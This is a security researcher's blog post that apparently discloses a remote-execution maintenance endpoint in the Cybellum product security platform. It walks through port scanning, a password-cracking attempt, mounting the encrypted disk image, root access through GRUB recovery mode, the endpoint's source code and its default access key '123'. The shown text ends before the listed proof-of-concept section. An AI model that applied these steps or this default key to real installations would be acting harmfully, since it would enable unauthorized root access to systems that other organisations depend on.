<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Take a glance of  browser, I find Cybellum RCEOne day I visited my friend @Imweekend. He was working on scanning the vulnerability of IVI firmware with Cybellum(The Product Security Platform). This Pl">
<meta property="og:type" content="article">
<meta property="og:title" content="Take a glance of  browser, I find Cybellum RCE">
<meta property="og:url" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/index.html">
<meta property="og:site_name" content="Delikely&#39;s Blog">
<meta property="og:description" content="Take a glance of  browser, I find Cybellum RCEOne day I visited my friend @Imweekend. He was working on scanning the vulnerability of IVI firmware with Cybellum(The Product Security Platform). This Pl">
<meta property="og:locale">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/db928a6e2257e36f037d7028ca69982.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20231226013456489.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20230528184442715.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106165344944.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106170230648.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106172132756.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106174138633.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106182339175.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106182533068.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106182807215.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106183057195.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106184303046.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106184950501.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106185005189.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106185117207.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106185545651.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106185719258.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106191143538.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106190919877.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240108105530439.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240108105639641.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240108110859694.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240106220903113.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/image-20240108125724597.png">
<meta property="og:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/cybellum_backdoor_exp.gif">
<meta property="article:published_time" content="2024-02-18T07:00:00.000Z">
<meta property="article:modified_time" content="2024-02-19T14:51:33.245Z">
<meta property="article:author" content="Delikely">
<meta property="article:tag" content="Automotive">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://delikely.github.io/2024/02/18/Cybellum-RCE/db928a6e2257e36f037d7028ca69982.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/rice.svg">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/rice.svg" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/rice.png">
          
        
    
    <!-- title -->
    <title>Take a glance of  browser, I find Cybellum RCE</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Delikely's Blog" type="application/atom+xml"><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

<body class="max-width mx-auto px3">
    
      <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/2018/04/11/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/delikely">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2099/01/01/genius-vulns/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2023/11/16/pydroid/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://delikely.github.io/2024/02/18/Cybellum-RCE/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&text=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&is_video=false&description=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Take a glance of  browser, I find Cybellum RCE&body=Check out this article: http://delikely.github.io/2024/02/18/Cybellum-RCE/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&name=Take a glance of  browser, I find Cybellum RCE&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&text=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Take-a-glance-of-browser-I-find-Cybellum-RCE"><span class="toc-number">1.</span> <span class="toc-text">Take a glance of  browser, I find Cybellum RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#About-Vendor"><span class="toc-number">1.1.</span> <span class="toc-text">About Vendor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Interesting-status"><span class="toc-number">1.2.</span> <span class="toc-text">Interesting status</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Regcongize-service"><span class="toc-number">1.3.</span> <span class="toc-text">Regcongize service</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Deployment-method"><span class="toc-number">1.4.</span> <span class="toc-text">Deployment method</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mount-qcow2-disk-image"><span class="toc-number">1.5.</span> <span class="toc-text">Mount qcow2 disk image</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Another-easy-way-to-get-in"><span class="toc-number">1.6.</span> <span class="toc-text">Another easy way to get in</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Analysis-backdoor"><span class="toc-number">1.7.</span> <span class="toc-text">Analysis backdoor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Proof-of-concept"><span class="toc-number">1.8.</span> <span class="toc-text">Proof of concept</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#About-Us"><span class="toc-number">1.9.</span> <span class="toc-text">About Us</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Timeline"><span class="toc-number">1.10.</span> <span class="toc-text">Timeline</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#More"><span class="toc-number">1.11.</span> <span class="toc-text">More</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Take a glance of  browser, I find Cybellum RCE
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Delikely's Blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2024-02-18T07:00:00.000Z" itemprop="datePublished">2024-02-18</time>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Automotive/" rel="tag">Automotive</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="Take-a-glance-of-browser-I-find-Cybellum-RCE"><a href="#Take-a-glance-of-browser-I-find-Cybellum-RCE" class="headerlink" title="Take a glance of  browser, I find Cybellum RCE"></a>Take a glance of  browser, I find Cybellum RCE</h2><p><img src="db928a6e2257e36f037d7028ca69982.png" alt=""><br>One day I visited my friend @Imweekend. He was working on scanning the vulnerability of IVI firmware with Cybellum(The Product Security Platform). This Platform is used to manage and validate SBOMs, detect and prioritize vulnerabilities, comply with regulations and manage incident response. This Platform is based on Browser/Server Architecture. </p>
<h3 id="About-Vendor"><a href="#About-Vendor" class="headerlink" title="About Vendor"></a>About Vendor</h3><p><a target="_blank" rel="noopener" href="https://cybellum.com/">Cybellum</a> is a company that provides product security solutions for device manufacturers in the automotive, medical and industrial sectors. It helps them manage cybersecurity and cyber compliance across the entire product lifecycle, from SBOM management to vulnerability management to incident response. LG Electronics acquired Cybellum, in 2021.</p>
<p>This platform is widely used throughout the world by OEMs(BMW,Nissan,Grate Wall etc.) 、Tier 1(Denso, Mobileye, Harmam etc.)、The Third Party Inspection Institution(CATARC, CAERI,CSTC,CEPREI etc.)</p>
<p><img src="image-20231226013456489.png" alt="image-20231226013456489" style="zoom:50%;" /></p>
<h3 id="Interesting-status"><a href="#Interesting-status" class="headerlink" title="Interesting status"></a>Interesting status</h3><p>With a glance at the web page, which caught my eyes. </p>
<p><img src="image-20230528184442715.png" alt="image-20230528184442715"></p>
<p><code>192.168.1.102:29000/api/tasks？access_key=123</code> return task status with exception <code>run—subprocess bash /tmp/bffed366—d3dl—4f1e-bc65—9a839b714add/start. sh</code> It looks like a normal task exception which execute failed, but the type <code>excute_rce</code> is interesting. RCE is the abbreviation of  “remote code execute”, RCE is a type of security vulnerability that allows attackers to run arbitrary code on a remote machine. RCE on everything is a security researcher’s dream.</p>
<p>As a security researcher, we are sensitive and curious about the world. <code>excute_rce</code> sense looks like a backdoor api, so we decide to dig into it deeper. Cybellum is a commercial product. It’s a black box to us. We require more information to investigate whether it is backdoor or not.</p>
<h3 id="Regcongize-service"><a href="#Regcongize-service" class="headerlink" title="Regcongize service"></a>Regcongize service</h3><p>First use nmap to find whether other port is open.</p>
<p><img src="image-20240106165344944.png" alt="image-20240106165344944"></p>
<p>Surprisingly, as a commercial product’s 22 (SSH) port is kept open. Login to the server requires a password. Failed to log in with the default password which is used on Web services of 443(https). Later, we use the hydra to crack the password with some wordlist, but still can’t get the correct password. </p>
<p><img src="image-20240106170230648.png" alt="image-20240106170230648"></p>
<p>Come back to view other ports. Some of them are web applications without url path, and we got a lot of error.</p>
<p><img src="image-20240106172132756.png" alt="image-20240106172132756"></p>
<h3 id="Deployment-method"><a href="#Deployment-method" class="headerlink" title="Deployment method"></a>Deployment method</h3><p>It’s hard to make progress at outer, so we try to extract firmware for further analysis. First we need to figure out the system deployment method.</p>
<p>We found the image named cybellum.qcow2. Qcow2 is a file format for disk image files used by QEMU. It is an updated version of the Qcow2 format and supports AES encryption.</p>
<p>Now we know Cybellum uses QEMU to serve the platform. Next step is to modify the qcow2 disk image and add a backdoor account for SSH service.  </p>
<h3 id="Mount-qcow2-disk-image"><a href="#Mount-qcow2-disk-image" class="headerlink" title="Mount qcow2 disk image"></a>Mount qcow2 disk image</h3><p>qemu-nbd is QEMU Disk Network Block Device Server, which  can be used to mount qcow2 image.</p>
<ol>
<li><p>Enable NBD on the Host</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">modprobe nbd max_part=8  </span><br></pre></td></tr></table></figure>
</li>
<li><p>Connect the QCOW2 as network block device</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-nbd -c /dev/nbd1 ./cybellum.qcow2 </span><br></pre></td></tr></table></figure>
</li>
<li><p>Find The Virtual Machine Partitions</p>
</li>
</ol>
<p><img src="image-20240106174138633.png" alt="image-20240106174138633"></p>
<p>​    Partition is 1M BOST boot; Partition /dev/nbd1p2  ;the biggest partition is /dev/nbd1p3.</p>
<ol start="4">
<li><p>Mount the partition from the VM</p>
<p>mount /dev/nbd1p3 failed, because <code>unknown filesystem type &#39;crypto_LUKS&#39;</code>. According to the error information <code>crypto_LUKS show</code>  is  /dev/nbd1p3 is crypt.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">└─<span class="comment"># mount /dev/nbd1p3 /media/file                                                                                     </span></span><br><span class="line">mount: /media/file: unknown filesystem <span class="built_in">type</span> <span class="string">&#x27;crypto_LUKS&#x27;</span>.</span><br><span class="line">       dmesg(1) may have more information after failed mount system call.</span><br></pre></td></tr></table></figure>
<p>cryptsetup can be used to mount encryption partition. Without a password,we are stagnant again.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># modprobe dm-crypt dm-mod</span><br><span class="line"># cryptsetup open &#x2F;dev&#x2F;nbd1p3 test</span><br><span class="line">Enter passphrase for &#x2F;dev&#x2F;nbd1p3: </span><br><span class="line"></span><br></pre></td></tr></table></figure>
</li>
<li><p>find encryption parameters</p>
<p>Before find a key,we need to know the encryption algorithm  and key length.<code>cryptsetup luksDump</code> can help us to dump the header information of a LUKS device. <code>cryptsetup luksDump /dev/nbd1p3</code> show ciper is aes-xts-plain64、key is 512 bits.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">LUKS header information</span><br><span class="line">Version:       	2</span><br><span class="line">Epoch:         	5</span><br><span class="line">Metadata area: 	16384 [bytes]</span><br><span class="line">Keyslots area: 	16744448 [bytes]</span><br><span class="line">UUID:          	871011b5-f0cd-47d7-946c-a1dc6c356359</span><br><span class="line">Label:         	(no label)</span><br><span class="line">Subsystem:     	(no subsystem)</span><br><span class="line">Flags:       	(no flags)</span><br><span class="line"></span><br><span class="line">Data segments:</span><br><span class="line">  0: crypt</span><br><span class="line">trueoffset: 16777216 [bytes]</span><br><span class="line">truelength: (whole device)</span><br><span class="line">truecipher: aes-xts-plain64</span><br><span class="line">truesector: 512 [bytes]</span><br><span class="line"></span><br><span class="line">Keyslots:</span><br><span class="line">  1: luks2</span><br><span class="line">trueKey:        512 bits</span><br><span class="line">truePriority:   normal</span><br><span class="line">trueCipher:     aes-xts-plain64</span><br><span class="line">trueCipher key: 512 bits</span><br><span class="line">truePBKDF:      argon2i</span><br><span class="line">trueTime cost:  4</span><br><span class="line">trueMemory:     945543</span><br><span class="line">trueThreads:    4</span><br><span class="line">trueSalt:       74 e4 f0 7d 4c 6f 9e dc 4a e4 6c 74 13 7c fa 90 </span><br><span class="line">true            37 b4 39 2e 9a 51 71 92 da c5 c8 c7 d7 a0 d7 5e </span><br><span class="line">trueAF stripes: 4000</span><br><span class="line">trueAF <span class="built_in">hash</span>:    sha256</span><br><span class="line">trueArea offset:290816 [bytes]</span><br><span class="line">trueArea length:258048 [bytes]</span><br><span class="line">trueDigest ID:  0</span><br><span class="line">Tokens:</span><br><span class="line">Digests:</span><br><span class="line">  0: pbkdf2</span><br><span class="line">trueHash:       sha256</span><br><span class="line">trueIterations: 121362</span><br><span class="line">trueSalt:       e9 a4 5f f5 b0 04 70 68 fd 9e d0 1e 10 90 05 18 </span><br><span class="line">true            e0 64 03 b4 c2 56 e5 8e 6e 2a 91 d8 c6 6e 66 ed </span><br><span class="line">trueDigest:     22 62 2a 43 6c f5 1b 36 88 b2 fb 7c ae 86 39 c1 </span><br><span class="line">true            b2 27 a7 ab 94 12 d3 72 9b 24 e8 fa a1 e9 f9 c2 </span><br><span class="line">                                                                             </span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>​      When I delicated to find the AES 512 key, @Imweekend found another way to get access to the system.</p>
<p>​    <em>NOTICE:  decrypt and modify image see next blog.</em></p>
<h3 id="Another-easy-way-to-get-in"><a href="#Another-easy-way-to-get-in" class="headerlink" title="Another easy way to get in"></a>Another easy way to get in</h3><ol>
<li><p>convert qcow2 to vmdk </p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-img convert -f qcow2 cybellum.qcow2 -O vmdk cybellum.vmdk</span><br></pre></td></tr></table></figure>
</li>
<li><p>Use VMware Workstation to create new virtual machine with existing virtual disk(cybellum.vmdk)</p>
<p><img src="image-20240106182339175.png" alt="image-20240106182339175" style="zoom:50%;" /></p>
</li>
<li><p>Grub and character console are available</p>
<p>Open virtual machine, hold <code>Shift</code> during loading Grub. Grub lacks protection. The next step is that we can reset the root password through grub.</p>
<p><img src="image-20240106182533068.png" alt="image-20240106182533068"></p>
<p>  Print a lot of information during normal booting.</p>
<p><img src="image-20240106182807215.png" alt="image-20240106182807215"></p>
<p> After boot finished, virtual graph console without show login conversion like other normal condition. </p>
<p><img src="image-20240106183057195.png" alt="image-20240106183057195"></p>
<p> It indicate graph console is forbidden, but the virtual character console is still available. Use <code>ALT+F1-F6</code> switch to other console.</p>
<p><img src="image-20240106184303046.png" alt="image-20240106184303046"></p>
</li>
<li><p>reset root password</p>
<p>Open virtual machine, hold <code>Shift</code> during loading Grub. Go to submenu <code>Advcaned options for Ubuntu</code>.</p>
<p><img src="image-20240106184950501.png" alt="image-20240106184950501" style="zoom:82%;" /></p>
<p>You will then be prompted by a menu that looks something like this,continue enter to <code>recovery mode</code>.</p>
<p><img src="image-20240106185005189.png" alt="image-20240106185005189"></p>
<p>Using the arrow keys scroll down to <strong>root</strong> and then hit Enter.</p>
<p><img src="image-20240106185117207.png" alt="image-20240106185117207"></p>
<p>Now see a root prompt, something like this,set the user’s password with the <code>passwd</code> command.</p>
<p><img src="image-20240106185545651.png" alt="image-20240106185545651"></p>
</li>
<li><p>get access of the OS</p>
<p>After reboot the system,and hit <code>ALT+2</code> switch to character console,  we are able to log in with the new password.</p>
<p><img src="image-20240106185719258.png" alt="image-20240106185719258"></p>
</li>
</ol>
<h3 id="Analysis-backdoor"><a href="#Analysis-backdoor" class="headerlink" title="Analysis backdoor"></a>Analysis backdoor</h3><p>According this keyword<code>execute_rce</code>, we did some digging and we found a backdoor api  <code>/api/execute_rce</code>. Uploading an encrypted zip file containing start.sh can achieve arbitrary code execution and obtain the system with root privilege.</p>
<p>Login into Ubuntu, using <code>ss</code> know 29000 port is hosted by python.</p>
<p><img src="image-20240106191143538.png" alt="image-20240106191143538"></p>
<p>Grep the keyword <code>execute_rce</code>, source code at /usr/local/lib/python3.8/dist_packages/maintenance_server_microservic.</p>
<p><img src="image-20240106190919877.png" alt="image-20240106190919877"></p>
<p><code>exexute_rce</code> route path is <code>/api/execute_rce</code>. </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ExecuteRCE</span>:</span></span><br><span class="line">    NAME = <span class="string">&#x27;execute_rce&#x27;</span></span><br><span class="line">    URI = <span class="string">&#x27;/api/execute_rce&#x27;</span></span><br><span class="line">    METHODS = [<span class="string">&#x27;POST&#x27;</span>]</span><br></pre></td></tr></table></figure>
<p>In maintenance_server_microservice has documentation.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">% tree -L 2 maintenance_server_microservice</span><br><span class="line">.</span><br><span class="line">├── __init__.py</span><br><span class="line">├── __pycache__</span><br><span class="line">├── _maintenance_server_microservice.py</span><br><span class="line">├── apis</span><br><span class="line">├── app.py</span><br><span class="line">├── documentation</span><br><span class="line">│   ├── apis.html</span><br><span class="line">│   ├── common</span><br><span class="line">│   ├── cybellum-logo-black.svg</span><br><span class="line">│   ├── cybellum-logo-white.svg</span><br><span class="line">│   ├── description.md</span><br><span class="line">│   ├── docs-api-font.css</span><br><span class="line">│   ├── main.json</span><br><span class="line">│   ├── redoc.standalone.js</span><br><span class="line">│   └── schemas</span><br><span class="line">├── file_signer</span><br><span class="line">├── microservice</span><br><span class="line">├── scripts</span><br><span class="line">├── utils</span><br><span class="line">└── wsgi.py</span><br></pre></td></tr></table></figure>
<p>The document Maintenance Server API (1.0) on<code>http://ip:29000/docs/</code> .</p>
<p><img src="image-20240108105530439.png" alt="image-20240108105530439"></p>
<p>As the document show, The Maintenance Server is a service that expose an interface to the user that suppors the following operations:</p>
<ol>
<li><strong>System install</strong> - allows deployment of a fresh system using supplied installation pack.</li>
<li><strong>System update</strong> - allows deployment of a new version of the system</li>
<li><strong>Restore database</strong> - allows a system database restore after it was backed-up using the backup functionality.</li>
<li><strong>RCE Execution</strong> - allows execution of a signed script on the machine (supplied by Cybellum).</li>
<li><strong>Update certificates</strong> - allows update of the TLS/SSL certificates of the system</li>
</ol>
<p><strong>RCE Execution</strong> is the target that allows execution of a signed script on the machine.  The sign process may be secure or not. Next we try to analyze the sign process and find the sign key. </p>
<p><code>execute-rce</code> API document  available on <code>http://ip:29000/docs/#operation/execute-rce</code>.</p>
<p><img src="image-20240108105639641.png" alt="image-20240108105639641"></p>
<p>Function <code>api_execute_rce</code>   implement in apis/apis.py.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">api_execute_rce</span>(<span class="params">self</span>):</span></span><br><span class="line">    args = parse_webargs(MaintenanceServerAPISParamsSpecs.EXECUTE_RCE, request)</span><br><span class="line">    api_params_names = MaintenanceServerAPIDefinitions.ExecuteRCE.Params</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> request.files <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="built_in">len</span>(request.files) != <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">raise</span> ReceivedNotEnoughFilesException()</span><br><span class="line"></span><br><span class="line">        access_key = args[api_params_names.ACCESS_KEY]</span><br><span class="line">        rce_file = api_params_names.RCE_FILE</span><br><span class="line"></span><br><span class="line">        self._validate_access_key(access_key)</span><br><span class="line"></span><br><span class="line">        temp_directory = filesystemex.create_temp_directory()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            self._unpack_file(temp_directory, rce_file, self.RCE_FILE)</span><br><span class="line">            <span class="keyword">except</span>:</span><br><span class="line">                filesystemex.delete_folder(temp_directory)</span><br><span class="line">                <span class="keyword">raise</span></span><br><span class="line"></span><br><span class="line">                task = ExecuteRCETask(rce_file_name=self.RCE_FILE,</span><br><span class="line">                                      task_manager=self.task_manager,</span><br><span class="line">                                      files_root=temp_directory)</span><br><span class="line">                self.task_manager.submit_task(task)</span><br><span class="line"></span><br><span class="line">                <span class="keyword">return</span> SuccessResponse(&#123;<span class="string">&quot;task&quot;</span>: task.to_json()[task.task_id]&#125;).generate_response()</span><br></pre></td></tr></table></figure>
<p>api_execute_rce get two parameters <code>access_key</code> and <code>rce_file</code> from frontend. </p>
<p><img src="image-20240108110859694.png" alt="image-20240108110859694"></p>
<p>First, use validate_access_key(access_key)  validate access key.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_validate_access_key</span>(<span class="params">self, access_key</span>):</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(self.ACCESS_KEY_FILE_PATH) <span class="keyword">as</span> f:</span><br><span class="line">        content = json.load(f)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> content <span class="keyword">or</span> <span class="string">&#x27;access_key&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> content <span class="keyword">or</span> content[<span class="string">&#x27;access_key&#x27;</span>] != access_key:</span><br><span class="line">            <span class="keyword">raise</span> InvalidAccessKeyException()</span><br></pre></td></tr></table></figure>
<p>ACCESS_KEY_FILE_PATH link to <code>/mnt/cybellum/maintenance_server/access_key.json</code>, default access_key is 123.</p>
